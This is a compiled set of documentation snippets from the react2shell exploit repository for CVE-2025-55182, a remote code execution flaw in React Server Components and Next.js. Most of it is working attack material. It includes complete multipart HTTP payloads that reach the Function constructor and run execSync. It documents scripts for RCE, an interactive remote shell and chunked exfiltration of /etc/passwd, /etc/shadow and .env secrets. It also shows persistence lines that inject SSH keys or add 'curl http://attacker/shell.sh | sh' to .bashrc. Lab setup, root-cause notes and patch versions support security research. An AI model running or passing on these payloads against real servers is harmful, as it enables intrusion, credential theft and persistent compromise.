### Start Vulnerable Next.js Server
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Installs dependencies and starts the vulnerable Next.js server locally. The server will be accessible at http://localhost:3443. Ensure you have pnpm installed.
```bash
cd vulnerable-next-server
pnpm install
pnpm dev
```
--------------------------------
### Start Vulnerable Server (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
Starts the vulnerable Next.js server in development mode. This command navigates to the server directory and runs the development server, which will be listening on http://localhost:3443. Ensure PNPM is installed for package management.
```bash
cd vulnerable-next-server
pnpm dev
# Server runs on http://localhost:3443
```
--------------------------------
### Reproducing Vulnerable Next.js Server Locally (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
These bash commands outline the steps to clone and run the vulnerable Next.js server locally for testing. It includes installing dependencies with pnpm and starting the development server.
```bash
git clone https://github.com/freeqaz/react2shell
cd react2shell/vulnerable-next-server
pnpm install
pnpm dev
```
--------------------------------
### Install and Run Next.js Development Server
Source: https://github.com/freeqaz/react2shell/blob/master/vulnerable-next-server/README.md
Installs project dependencies using pnpm and starts the Next.js development server on port 3443. This is the primary method for setting up the vulnerable testing environment.
```bash
pnpm install
pnpm dev
```
--------------------------------
### Starting the Vulnerable Next.js Development Server
Source: https://context7.com/freeqaz/react2shell/llms.txt
Instructions for setting up a vulnerable Next.js server environment. This involves cloning the repository with submodules, installing dependencies using pnpm, and starting the development server, typically on port 3443.
```bash
# Clone with submodules (includes React 19.2.0 and Next.js 16.0.6 source)
git clone --recurse-submodules https://github.com/freeqaz/react2shell
cd react2shell/vulnerable-next-server
# Install dependencies
pnpm install
# Start in development mode (port 3443)
pnpm dev
# Output:
# ▲ Next.js 16.0.6
# - Local: http://localhost:3443
# - Network: http://192.168.1.100:3443
#
# ✓ Ready in 1.8s
# Test from another terminal:
cd ..
./detect.sh http://localhost:3443
```
--------------------------------
### Launch Interactive Shell
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Starts an interactive pseudo-shell session on the target server, allowing for command execution and exploration similar to a standard terminal. Recommended for in-depth analysis.
```bash
./shell.sh http://localhost:3443
```
--------------------------------
### Start Vulnerable Server in Production Mode (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
Starts the vulnerable Next.js server in production mode. This involves building the application and then starting the production server. This mode tests the server's error sanitization behavior in a production environment.
```bash
cd vulnerable-next-server
NODE_ENV=production pnpm build && pnpm start
# Tests production error sanitization behavior
```
--------------------------------
### Vulnerable Next.js Server Setup
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Contains the source code for a pre-configured vulnerable Next.js server, specifically Next.js 16.0.6 combined with React 19.2.0, which is susceptible to the disclosed vulnerabilities.
```bash
cd vulnerable-next-server/
pnpm install
pnpm dev
```
--------------------------------
### Starting Production Server (Bash)
Source: https://context7.com/freeqaz/react2shell/llms.txt
Commands to build and start the Next.js server in production mode. Production mode has sanitized error messages but still allows for certain exploit vectors.
```bash
# Build and start production server
cd vulnerable-next-server
NODE_ENV=production pnpm build && pnpm start
```
--------------------------------
### Clone Project with Git Submodules
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Instructions for cloning the `react2shell` project, including its Git submodules which contain the vulnerable source code for React and Next.js. This is crucial for source code analysis and understanding the vulnerability.
```bash
git clone --recurse-submodules https://github.com/freeqaz/react2shell
# Or if already cloned:
git submodule update --init --recursive
```
--------------------------------
### Build and Run Next.js Production Server
Source: https://github.com/freeqaz/react2shell/blob/master/vulnerable-next-server/README.md
Builds the Next.js application for production and then starts the production server. This mode is used to test production error sanitization, where certain exploit methods might not capture output but others remain functional.
```bash
pnpm build && pnpm start
```
--------------------------------
### Direct Module Gadget Exploit Syntax (JavaScript)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Shows examples of how the ejpir research PoC utilizes the 'module#export' syntax to directly access and execute built-in Node.js modules like 'vm', 'child_process', and 'fs'.
```javascript
// From: ./CVE-2025-55182-research/exploit-all-gadgets.js
{ id: 'vm#runInThisContext', bound: ['CODE'] }
{ id: 'child_process#execSync', bound: ['whoami'] }
{ id: 'fs#readFileSync', bound: ['/etc/passwd'] }
```
--------------------------------
### Plain Text Payload Example (HTTP)
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
This snippet illustrates a 'text/plain' POST request payload. While simple, this method is noted as not viable for certain exploits because it may not allow referencing multiple data chunks, only creating a single field.
```http
POST / HTTP/1.1
Content-Type: text/plain
Next-Action: x
{"then":"$1:__proto__:then",...}
```
--------------------------------
### JavaScript Persistence Attacks using fs Module
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Shows examples of persistence attacks using the Node.js 'fs' module to inject SSH keys, add shell backdoors to .bashrc, or tamper with module source code.
```javascript
// SSH key injection
fs.appendFileSync('~/.ssh/authorized_keys', '\nssh-rsa ATTACKER_KEY...')
// Shell backdoor
fs.appendFileSync('~/.bashrc', '\ncurl http://attacker/shell.sh | sh')
// Source tampering
fs.writeFileSync('node_modules/...', 'malicious code')
```
--------------------------------
### Interactive Shell for Remote Servers
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
The `shell.sh` script provides an interactive shell experience for remote servers, mimicking a local shell. It includes features like tracking the working directory (persistent `cd`), command history, a colored prompt indicating user, host, and current working directory. It also supports a built-in `download` command for file exfiltration and allows local command execution prefixed with `!`. Each command is sent as a separate HTTP request.
```bash
./shell.sh http://localhost:3443
```
--------------------------------
### Exfiltrate Files with Chunking
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
The `exfil-file.sh` script facilitates the exfiltration of files from a target server. It supports basic usage to output to stdout, saving to a local file, and exfiltrating application secrets. For large files exceeding the header limit, it automatically switches to a chunked mode using `dd` to extract data in ~6KB pieces and reassembles them locally. The chunk size can be configured.
```bash
# Basic usage - output to stdout
./exfil-file.sh http://localhost:3443 /etc/passwd
# Save to local file
./exfil-file.sh http://localhost:3443 /etc/passwd ./passwd.txt
# Exfiltrate application secrets
./exfil-file.sh https://target.com /app/.env ./env.txt
# Override chunk size (default: 6000 bytes)
CHUNK_SIZE=4000 ./exfil-file.sh http://target /var/log/large.log
```
--------------------------------
### Run Detection Script
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes the `detect.sh` script to identify vulnerabilities in a target application. It takes the target URL as an argument and relies on specific HTTP responses (500 status, `E{"digest"` in response, `text/x-component` Content-Type) to indicate a vulnerable server.
```bash
./detect.sh http://target:3000
```
--------------------------------
### Interactive Shell via CVE-2025-55182 (Bash)
Source: https://context7.com/freeqaz/react2shell/llms.txt
This script provides a pseudo-interactive shell experience over RCE, leveraging CVE-2025-55182. It includes features like directory tracking, file downloading, and a set of built-in commands. The example session demonstrates its usage for command execution, file system navigation, and file retrieval.
```bash
#!/bin/bash
# shell.sh - Interactive REPL shell over CVE-2025-55182
./shell.sh https://target.example.com
# Example session:
# ╔═══════════════════════════════════════════════════════════╗
# ║ CVE-2025-55182 Interactive Shell ║
# ║ React Server Components RCE ║
# ╚═══════════════════════════════════════════════════════════╝
#
# [*] Connecting to https://target.example.com...
# Connected!
# User: www-data
# Host: webserver-prod-01
# CWD: /var/www/nextjs-app
#
# www-data@webserver-prod-01:/var/www/nextjs-app$ id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@webserver-prod-01:/var/www/nextjs-app$ ls -la
# total 128
# drwxr-xr-x 8 www-data www-data 4096 Dec 3 10:15 .
# drwxr-xr-x 3 www-data www-data 4096 Dec 1 08:30 ..
# -rw-r--r-- 1 www-data www-data 234 Dec 1 08:30 .env
# drwxr-xr-x 3 www-data www-data 4096 Dec 1 08:30 app
# -rw-r--r-- 1 www-data www-data 1892 Dec 1 08:30 next.config.js
#
# www-data@webserver-prod-01:/var/www/nextjs-app$ cd /etc
# www-data@webserver-prod-01:/etc$ cat hostname
# webserver-prod-01
#
# www-data@webserver-prod-01:/etc$ download passwd ./local-passwd.txt
# [*] Downloading: /etc/passwd -> ./local-passwd.txt
# [*] Attempting quick exfil (single request)...
# [+] Quick exfil succeeded: 1847 bytes
# [+] Saved to: ./local-passwd.txt
#
# www-data@webserver-prod-01:/etc$ !cat local-passwd.txt | head -3
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# bin:x:2:2:bin:/usr/sbin:/usr/sbin/nologin
#
# www-data@webserver-prod-01:/etc$ help
# Built-in commands:
# help Show this help
# exit, quit, q Exit the shell
# cd
Change directory (state tracked between commands)
# download [o] Download remote file to local path
# ! Run command locally (not on target)
#
# www-data@webserver-prod-01:/etc$ exit
# Goodbye!
```
--------------------------------
### Exploit RCE via HTTP 500 Throw (Dev Mode)
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server and captures its standard output using an HTTP 500 error. This method is only effective in development mode. Replace 'COMMAND' with the desired command.
```bash
./exploit-throw.sh http://localhost:3443 "id"
```
--------------------------------
### Exploit RCE via HTTP 303 Redirect
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server and captures its standard output via an HTTP 303 redirect. This is the recommended exploit method. Replace 'COMMAND' with the desired command (e.g., 'id', 'cat /etc/passwd').
```bash
./exploit-redirect.sh http://localhost:3443 "id"
./exploit-redirect.sh http://localhost:3443 "cat /etc/passwd"
```
--------------------------------
### Chunking RCE Output in Redirect Mode for Large Files
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
These bash commands provide an example of how to retrieve large command outputs or file contents in chunks when using redirect-mode RCE, circumventing HTTP header size limitations. By repeatedly executing `dd` with `skip` and `count` parameters, different segments of the target file can be extracted sequentially.
```bash
./exploit-redirect.sh target "dd if=/etc/passwd bs=6000 count=1"
```
```bash
./exploit-redirect.sh target "dd if=/etc/passwd bs=6000 count=1 skip=1"
```
--------------------------------
### Multipart Form Data Payload Example (HTTP)
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
This snippet shows a 'multipart/form-data' POST request payload. It is used to send data in multiple parts, suitable for complex payloads or when other content types might be blocked. It includes JSON data and a reference to another part.
```http
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model",...}
------Boundary
Content-Disposition: form-data; name="1"
"$@0"
------Boundary--
```
--------------------------------
### Output Capture Strategies via Function Calls
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
Demonstrates how to capture output from a constructed function by manipulating its resolution. Different strategies yield output in various ways: none (Blind), error body (Throw), redirect header (Redirect), or as a resolved argument (Reflect). The 'Redirect' method is recommended for production environments.
```javascript
function fn(resolve, reject) {
// Example for Redirect strategy
throw {digest:'NEXT_REDIRECT;...;'+b64(output)};
}
// Example for Reflect strategy
// arguments[0]([execSync('CMD').toString()])
```
--------------------------------
### Executing Commands for Output Capture (Node.js)
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
Illustrates the use of Node.js's `execSync` to execute shell commands as part of output capture strategies. The output is then converted to a string for further processing.
```javascript
const { execSync } = require('child_process');
// Used in Blind strategy
// execSync('CMD');0
// Used in Throw strategy
// throw execSync('CMD').toString()
// Used in Reflect strategy
// arguments[0]([execSync('CMD').toString()])
```
--------------------------------
### JavaScript: Server Reference Loading
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Illustrates how server references are loaded in a bundler configuration, highlighting the manifest lookup for action existence. This code is crucial for understanding the execution flow that can be exploited.
```javascript
function loadServerReference(bundlerConfig, id, bound) {
var serverReference = resolveServerReference(bundlerConfig, id);
// ↑ Manifest lookup happens here - fails if action doesn't exist
```
--------------------------------
### Test Vulnerability Detection
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Checks if the target server at the provided URL is vulnerable to CVE-2025-55182 / CVE-2025-66478. This script is non-destructive.
```bash
chmod +x *.sh
./detect.sh http://localhost:3443
```
--------------------------------
### POST / Multipart Payload (Redirect Mode)
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
Example of a raw HTTP POST request using multipart/form-data for the Redirect exploit mode.
```APIDOC
## Multipart Payload (Default)
### Raw HTTP Request (Redirect Mode)
```http
POST / HTTP/1.1
Host: localhost:3443
User-Agent: Mozilla/5.0
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length:
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"var o=Buffer.from(process.mainModule.require('child_process').execSync('id')).toString('base64');var e=new Error();e.digest='NEXT_REDIRECT;push;http://x/'+o+';307;';throw e;","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
```
--------------------------------
### Launch Interactive Shell (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
Provides an interactive shell experience over the RCE vulnerability. Supports common shell commands like `cd`, `download`, `help`, `exit`, and executing local commands prefixed with `!`. It also tracks the current directory on the server.
```bash
./shell.sh http://localhost:3443
# Provides interactive shell experience over RCE
# Supports: cd, download, help, exit, !local_cmd
```
--------------------------------
### Exfiltrate File Content
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Extracts the content of a specified file from the target server and saves it locally. This script automatically handles large files by chunking them. Replace '/path/to/remote/file' and './local/destination.txt'.
```bash
./exfil-file.sh http://localhost:3443 /etc/passwd ./passwd.txt
```
--------------------------------
### Node Module Search Strategies for Flight Protocol Vulnerability
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
These bash commands illustrate how to search within Node modules for files and patterns related to the Flight protocol vulnerability, including Flight protocol implementation, reference resolution, and blob handling.
```bash
# Find Flight protocol implementation
grep -r "initializeModelChunk" vulnerable-next-server/node_modules/
# Find reference resolution
grep -r "__proto__" vulnerable-next-server/node_modules/ | grep -v ".map"
# Find blob handling
grep -r '\$B' vulnerable-next-server/node_modules/ | grep -v ".map"
```
--------------------------------
### Exploit Blind RCE
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server where the output is only visible in the server's terminal logs, not returned in the HTTP response. Replace 'COMMAND' with the desired command.
```bash
./exploit-blind.sh http://localhost:3443 "whoami"
```
--------------------------------
### Enumerate Action IDs
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Discovers valid 'action IDs' on the target server, which are required for URL-encoded and stealth exploit modes. These IDs are typically used to identify specific server actions.
```bash
./enumerate-actions.sh http://localhost:3443
```
--------------------------------
### Clone Repository with Submodules (Bash)
Source: https://github.com/freeqaz/react2shell/blob/master/CLAUDE.md
Clones the react2shell repository, ensuring that all git submodules, including vulnerable versions of React and Next.js, are also downloaded. Alternatively, if the repository is already cloned, this command can be used to initialize and update the submodules.
```bash
git clone --recurse-submodules https://github.com/freeqaz/react2shell
# Or if already cloned:
git submodule update --init --recursive
```
--------------------------------
### Helper Tools Summary
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
Summary of helper scripts, their purpose, and any relevant notes.
```APIDOC
## Helper Tools Summary
| Script | Purpose | Notes |
|---|---|---|
| `shell.sh` | Interactive shell | REPL with cd tracking, file download, readline history |
| `exfil-file.sh` | File exfiltration | Auto-chunks large files, reassembles locally |
| `enumerate-actions.sh` | Action ID discovery | Scrapes HTML for server action IDs |
| `detect.sh` | Vulnerability probe | Non-destructive detection (Searchlight method) |
| `test-size-limit.sh` | Size limit testing | Test header size limits on target |
```
--------------------------------
### Raw Payload: Array.map Chaining (lachlan2k)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Example of a raw payload demonstrating Array.map chaining, as utilized in the lachlan2k exploit. This payload exploits a vulnerability through chained method calls, specifically `map`.
```text
0=$1
1={"status":"resolved_model","reason":0,"_response":"$4","value":"{\"then\":\"$3:map\",\"0\":{\"then\":\"$B3\"},\"length\":1}","then":"$2:then"}
2=$@3
3=[]
4={"_prefix":"CODE","_formData":{"get":"$3:constructor:constructor"},"_chunks":"$2:_response:_chunks"}
```
--------------------------------
### Root Cause Analysis - Flight Protocol Deserialization
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Illustrates the core vulnerability in the Flight protocol's deserialization process. The lack of property existence validation in path resolution allows for traversal to '__proto__.constructor.constructor', enabling RCE.
```javascript
// Vulnerable code pattern
for (let i = 1; i < path.length; i++) {
value = value[path[i]]; // No hasOwnProperty check!
}
```
--------------------------------
### Raw Payload: Proto Pollution (React2Shell)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Example of a raw multipart form-data payload used for triggering proto pollution in React2Shell. This payload is designed to exploit a vulnerability related to chunk reference resolution during deserialization.
```text
------WebKitFormBoundary
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"CODE","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundary
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundary--
```
--------------------------------
### Identifying Vulnerable Package Versions with JSON
Source: https://context7.com/freeqaz/react2shell/llms.txt
Provides a JSON snippet from 'package.json' indicating vulnerable versions of 'react-server-dom-webpack' and 'next'. It also includes npm commands to check installed versions and upgrade to patched versions.
```json
// package.json vulnerability indicators
{
"dependencies": {
// VULNERABLE React versions
"react-server-dom-webpack": "19.0.0 || 19.1.0 || 19.1.1 || 19.2.0",
"react-server-dom-turbopack": "19.0.0 || 19.1.0 || 19.1.1 || 19.2.0",
"react-server-dom-parcel": "19.0.0 || 19.1.0 || 19.1.1 || 19.2.0",
// VULNERABLE Next.js versions
"next": "15.0.0 - 15.0.4 || 15.1.0 - 15.1.8 || 15.2.0 - 15.2.5 || 15.3.0 - 15.3.5 || 15.4.0 - 15.4.7 || 15.5.0 - 15.5.6 || 16.0.0 - 16.0.6"
}
}
// Check installed versions:
npm ls next react-server-dom-webpack react-server-dom-turbopack
// Upgrade to patched versions:
npm install next@latest // 16.0.7+ or 15.x patched versions
npm install react-server-dom-webpack@latest // 19.2.1+
```
--------------------------------
### Exploit Stealth RCE via HTTP 200
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server, returning an HTTP 200 OK status code. This method requires a valid ACTION_ID and an echo-style action payload. Replace 'ACTION_ID' and 'COMMAND'.
```bash
./exploit-reflect.sh http://localhost:3443 "ACTION_ID" "id"
```
--------------------------------
### Exploiting React Flight Protocol via Prototype Pollution (HTTP POST)
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
This snippet demonstrates a crafted multipart POST request exploiting React's Flight protocol. It abuses the reference system to traverse the prototype chain and achieve arbitrary code execution by tricking the deserializer into calling the JavaScript Function constructor. No prerequisites are needed for this attack.
```http
POST / HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----Boundary
Next-Action: x
------Boundary
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","value":"{...}","_response":{...}}
------Boundary
Content-Disposition: form-data; name="1"
"$@0"
------Boundary--
```
--------------------------------
### Function Reference Exploit with #constructor (Python)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Demonstrates the exploitation chain used by the shellinteractive PoC, leveraging Flight's function reference syntax combined with manifest lookup to reach the Function constructor. This requires a valid action ID.
```python
# From: ./CVE-2025-55182-shellinteractive/interative.py:90-94
multipart_data = {
'0': (None, '"$F1"'),
'1': (None, '{"id": "action_id#constructor", "bound": "$@2"}'),
'2': (None, '["{CODE}"]')
}
```
--------------------------------
### Raw Payload: $F Reference (Shellinteractive)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
Example of a raw multipart form-data payload used for the shellinteractive exploit, involving an '$F' reference. This payload targets the `loadServerReference` function by manipulating the `$F` reference for command execution.
```text
------WebKitFormBoundary
Content-Disposition: form-data; name="0"
"$F1"
------WebKitFormBoundary
Content-Disposition: form-data; name="1"
{"id":"action#constructor","bound":"$@2"}
------WebKitFormBoundary
Content-Disposition: form-data; name="2"
["CODE"]
------WebKitFormBoundary--
```
--------------------------------
### React Flight Reply Server - `getOutlinedModel` Path Construction
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
Shows how the `getOutlinedModel` function constructs the `path` array from the provided reference string. In the exploit scenario, this results in `path = ["1", "__proto__", "then"]`, setting up the traversal of the prototype chain.
```javascript
// Relevant lines from ReactFlightReplyServer.js
// `path = ["1", "__proto__", "then"]`, `id = 1`
```
--------------------------------
### Asynchronous Command Execution (JavaScript)
Source: https://github.com/freeqaz/react2shell/blob/master/external-pocs/COMPARISON.md
JavaScript code demonstrating asynchronous command execution using `import('child_process')` and `execSync`. This snippet handles potential errors during command execution and returns the output or an error message.
```javascript
// From: ./CVE-2025-55182-shellinteractive/interative.py:75-85
return import('child_process').then(cp => {
try {
const output = cp.execSync(cmd).toString();
return output;
} catch(e) {
return "Command Execution Failed: " + e.message;
}
});
```
--------------------------------
### Exploit RCE via URL-Encoded Mode
Source: https://github.com/freeqaz/react2shell/blob/master/USAGE.md
Executes a command on the target server using a URL-encoded payload. This method may bypass certain Web Application Firewalls (WAFs) and requires a valid ACTION_ID obtained from enumeration. Replace 'ACTION_ID' and 'COMMAND'.
```bash
./exploit-urlencoded.sh http://localhost:3443 "ACTION_ID" "id"
```
--------------------------------
### URL-Encoded Payload Example (HTTP)
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
This snippet demonstrates a 'application/x-www-form-urlencoded' POST request payload. This method encodes data within the URL itself, often used for simpler data transmission or as a WAF evasion technique. It includes URL-encoded JSON data and references.
```http
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Next-Action: x
0=%7B%22then%22%3A%22%241%3A__proto__%3Athen%22%2C...%7D&1=%22%24%400%22
```
--------------------------------
### Exploit Request Format for URL-Encoded Payload (HTTP)
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
This is an example of an HTTP POST request formatted for exploiting the URL-encoded payload path in Next.js. It includes the necessary headers like 'Content-Type' and 'Next-Action' with a valid action ID, followed by the URL-encoded payload.
```http
POST / HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Next-Action:
0=&1=%22%24%400%22
```
--------------------------------
### Development vs. Production Error Output
Source: https://github.com/freeqaz/react2shell/blob/master/README.md
Compares the structure of error messages returned in development and production environments. In production, React strips detailed error information, impacting strategies that rely on message content.
```json
{
"digest": "...",
"name": "Error",
"message": "uid=501(free)...",
"stack": [
...
]
}
```
```json
{
"digest": "..."
}
```
--------------------------------
### Execute Command via HTTP Throw (Bash)
Source: https://context7.com/freeqaz/react2shell/llms.txt
This script attempts to execute a command on a target server using an HTTP throw method. It is effective in development mode but is broken in production builds due to sanitized error messages. It requires the target URL and the command to execute.
```bash
#!/bin/bash
./exploit-throw.sh http://localhost:3443 "whoami"
```
--------------------------------
### React Flight Reply Server - Model Initialization
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
Shows the function `initializeModelChunk` within React's Flight Reply Server, which is called when a chunk's status matches 'resolved_model'. This function proceeds to parse the model data, including JSON parsing, which is where the attacker's payload is processed.
```javascript
// Relevant lines from ReactFlightReplyServer.js
// `initializeModelChunk()` runs
// `JSON.parse(resolvedModel)` parses our payload
```
--------------------------------
### Raw HTTP Request for Redirect Mode
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
This is an example of a raw HTTP POST request using multipart/form-data for the Redirect Mode exploit. It includes the complete payload structure within the form data, targeting the '0' field. The `Content-Type` and `boundary` headers are crucial for proper parsing by the server.
```http
POST / HTTP/1.1
Host: localhost:3443
User-Agent: Mozilla/5.0
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length:
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"var o=Buffer.from(process.mainModule.require('child_process').execSync('id')).toString('base64');var e=new Error();e.digest='NEXT_REDIRECT;push;http://x/'+o+';307;';throw e;","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
--------------------------------
### Chunked File Exfiltration with Auto-Reassembly (Bash)
Source: https://context7.com/freeqaz/react2shell/llms.txt
The exfil-file.sh script facilitates file exfiltration by automatically chunking large files to bypass HTTP header size limitations and reassembling them locally. It supports outputting to stdout or saving to a specified local file. The script first attempts a quick exfiltration and falls back to chunked mode if necessary, providing detailed progress.
```bash
#!/bin/bash
# exfil-file.sh - Chunked file exfiltration with automatic reassembly
# Basic usage - output to stdout
./exfil-file.sh https://target.example.com /etc/passwd
# Save to local file
./exfil-file.sh https://target.example.com /var/log/nginx/access.log ./access.log
# Output:
# === CVE-2025-55182 File Exfiltration ===
# [*] Target: https://target.example.com
# [*] File: /var/log/nginx/access.log
# [*] Output: ./access.log
#
# [*] Attempting quick exfil (single request)...
# [!] Quick exfil failed or file too large, switching to chunked mode...
#
# [*] Getting file size for: /var/log/nginx/access.log
# [+] File size: 45678 bytes
# [*] Chunks needed: 8 (6000 bytes each)
# [*] Chunk 1/8: offset=0 size=6000
# [*] Chunk 2/8: offset=6000 size=6000
# [*] Chunk 3/8: offset=12000 size=6000
# [*] Chunk 4/8: offset=18000 size=6000
# [*] Chunk 5/8: offset=24000 size=6000
# [*] Chunk 6/8: offset=30000 size=6000
# [*] Chunk 7/8: offset=36000 size=6000
# [*] Chunk 8/8: offset=42000 size=3678
# [+] Exfiltrated 45678 bytes (expected: 45678)
# [+] Saved to: ./access.log
```
--------------------------------
### Next.js Action Handler - Request Processing
Source: https://github.com/freeqaz/react2shell/blob/master/EXPLOIT_NOTES.md
Illustrates the initial steps of request processing in Next.js's action handler. It shows how a POST request with 'Next-Action: x' triggers multipart handling and the creation of a Busboy instance, which is a precursor to the vulnerability.
```typescript
// Relevant lines from action-handler.ts
// POST with `Next-Action: x` triggers multipart handling
// Busboy instance created
// decodeReplyFromBusboy() called
```
--------------------------------
### Exfiltrate File with Chunking using exfil-file.sh
Source: https://github.com/freeqaz/react2shell/blob/master/PAYLOAD_REFERENCE.md
The `exfil-file.sh` script provides a robust solution for exfiltrating files of any size by automatically chunking them and reassembling them on the local machine. It includes options for basic usage, saving to a file, and customizing the chunk size. The script first attempts a single-request exfiltration and falls back to chunking if the file is too large.
```bash
# Basic usage - output to stdout
./exfil-file.sh http://localhost:3443 /etc/passwd
# Save to local file
./exfil-file.sh http://localhost:3443 /etc/shadow ./shadow.txt
# Custom chunk size (default: 6000 bytes)
CHUNK_SIZE=4000 ./exfil-file.sh http://localhost:3443 /var/log/app.log ./app.log
```